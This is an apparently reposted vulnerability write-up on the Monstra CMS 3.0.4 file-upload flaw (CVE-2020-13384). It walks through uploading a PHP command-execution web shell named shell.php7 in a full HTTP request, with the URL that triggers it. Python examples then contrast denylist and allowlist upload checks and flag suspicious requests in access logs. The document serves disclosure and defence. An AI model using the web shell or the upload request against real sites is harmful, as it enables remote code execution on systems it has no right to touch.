Monstra file upload (CVE-2020-13384)


All articles are for security research and learning purposes only; you bear the consequences yourself!


MonstraCMS is a modern, lightweight content management system based on PHP and XML. The whole system needs no database; it is said to have been developed by a Ukrainian company.

0x01 Vulnerability description

Monstra CMS 3.0.4 contains a security vulnerability caused by the program failing to validate file extensions correctly. An attacker can upload a file with a special suffix and execute arbitrary PHP code. Account credentials: admin/123456

The program rejects uploads whose suffix is one of: 'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'.
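The suffix list above is a denylist: anything not named is accepted, so an extension the web server also hands to the PHP interpreter but that is missing from the list slips through. The following is an added example, not code from the original post or from Monstra, that puts the post's denylist beside an allowlist check with a strict filename shape. The allowed-extension set and the sample filenames are constructed for the demonstration.

```python
"""Added example (not from the original post or from Monstra): contrast the
denylist-style suffix check the post describes with an allowlist check."""
import re

# Denylist of suffixes the post says the CMS rejects (copied from the post).
DENIED_EXTENSIONS = {
    'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4',
    'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c',
    'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif',
    'cmd', 'vxd', 'cpl', 'empty',
}

# Allowlist for an uploads folder that should only ever hold static assets.
# Constructed for this example; a real deployment chooses its own set.
ALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'}

# Acceptable name shape: one base name, exactly one dot, one short extension,
# no path separators, spaces or control characters.
SAFE_NAME = re.compile(r'^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})$')


def extension_of(filename: str) -> str:
    """Lowercased text after the last dot of the final path component ('' if none).

    A plain rsplit is used rather than os.path.splitext so that a name such as
    '.htaccess' yields 'htaccess', matching how the post's list treats it.
    """
    base = filename.replace('\\', '/').rsplit('/', 1)[-1]
    if '.' not in base:
        return ''
    return base.rsplit('.', 1)[-1].lower()


def denylist_allows(filename: str) -> bool:
    """Denylist check as the post describes it: reject only known-bad suffixes."""
    return extension_of(filename) not in DENIED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Allowlist check: the name must match SAFE_NAME and the extension must be permitted."""
    base = filename.replace('\\', '/').rsplit('/', 1)[-1]
    match = SAFE_NAME.match(base)
    if not match:
        return False
    return match.group(1).lower() in ALLOWED_EXTENSIONS


def compare(filenames):
    """Map each filename to (denylist_result, allowlist_result) for side-by-side review."""
    return {name: (denylist_allows(name), allowlist_allows(name)) for name in filenames}


if __name__ == '__main__':
    # 'shell.php7' is the filename from the post; the others are constructed.
    samples = ['photo.png', 'notes.txt', 'shell.php7', 'index.PHP', 'x.php.jpg', '.htaccess']
    for name, (deny_ok, allow_ok) in compare(samples).items():
        verdict = lambda ok: 'accept' if ok else 'reject'
        print(f'{name:12} denylist={verdict(deny_ok):7} allowlist={verdict(allow_ok)}')
```

Running it shows the gap the post exploits: the denylist accepts shell.php7 because 'php7' is simply absent from the list, while the allowlist rejects it because it is not a permitted asset type. The name-shape check also rejects double-extension names, which a last-suffix-only denylist never looks at.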

PoC

https://www.exploit-db.com/exploits/48479


0x02 Affected versions

3.0.4

0x03 Reproduction

  1. Go to: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/

  2. Upload a one-liner shell with the php7 extension, i.e. shell.php7

The request is as follows:

POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: 192.168.2.5
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.2.5
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"

2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>


------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"

Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--

  3. Trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id
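From the defender's side, the trigger step leaves a recognisable trace: a request for a script-like file under the publicly served uploads directory. The following is an added example, not part of the original post, that runs that check over a few constructed access-log lines in combined log format. The uploads prefix comes from the post's trigger URL; the log lines, the script-extension pattern and the field names are assumptions made for the demonstration.

```python
"""Added example (not from the original post): flag requests for script-like
files under the CMS uploads directory in web server access logs."""
import re
from dataclasses import dataclass

# Publicly served uploads path, taken from the trigger URL in the post.
UPLOADS_PREFIX = '/monstra/public/uploads/'

# Extensions a web server might hand to an interpreter. 'php\d*' covers the
# numbered variants (php3 .. php7) without listing each one. Assumption for
# this example; tune to the server's actual handler configuration.
SCRIPT_EXT = re.compile(r'\.(php\d*|phtml|phps|shtml|cgi|pl|py|sh)$', re.IGNORECASE)

# Combined log format; only the fields used here are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


@dataclass
class Hit:
    ip: str
    time: str
    path: str
    query: str
    status: int


def split_target(target: str):
    """Separate the request target into path and query string ('' if no query)."""
    path, _, query = target.partition('?')
    return path, query


def find_upload_script_hits(lines):
    """Return a Hit for every request whose path is a script-like file under UPLOADS_PREFIX.

    The query string is recorded but not used for matching: a request for the
    file is suspicious whether or not parameters are present.
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, query = split_target(m.group('target'))
        if not path.startswith(UPLOADS_PREFIX):
            continue
        if SCRIPT_EXT.search(path):
            hits.append(Hit(m.group('ip'), m.group('time'), path, query, int(m.group('status'))))
    return hits


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '192.168.2.10 - - [20/Jan/2020:10:00:01 +0000] "GET /monstra/public/uploads/photo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.2.10 - - [20/Jan/2020:10:00:05 +0000] "POST /monstra/admin/index.php?id=filesmanager HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.2.10 - - [20/Jan/2020:10:00:09 +0000] "GET /monstra/public/uploads/shell.php7?cmd=id HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.2.11 - - [20/Jan/2020:10:01:00 +0000] "GET /monstra/public/uploads/report.PDF HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(f'{hit.time} {hit.ip} {hit.path} query={hit.query!r} status={hit.status}')
```

Only the shell.php7 request is reported; the image, the PDF and the admin POST are ignored. Pairing a hit like this with the preceding POST to the files manager from the same address gives a concrete upload-then-execute timeline to investigate. A 200 status on such a hit also means the server actually executed or served the file, which matters for scoping.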

0x04 Fix

Upgrade to the latest version.

References

https://www.exploit-db.com/exploits/48479
https://xz.aliyun.com/t/7850


Reposted from blog.csdn.net/YouthBelief/article/details/121303412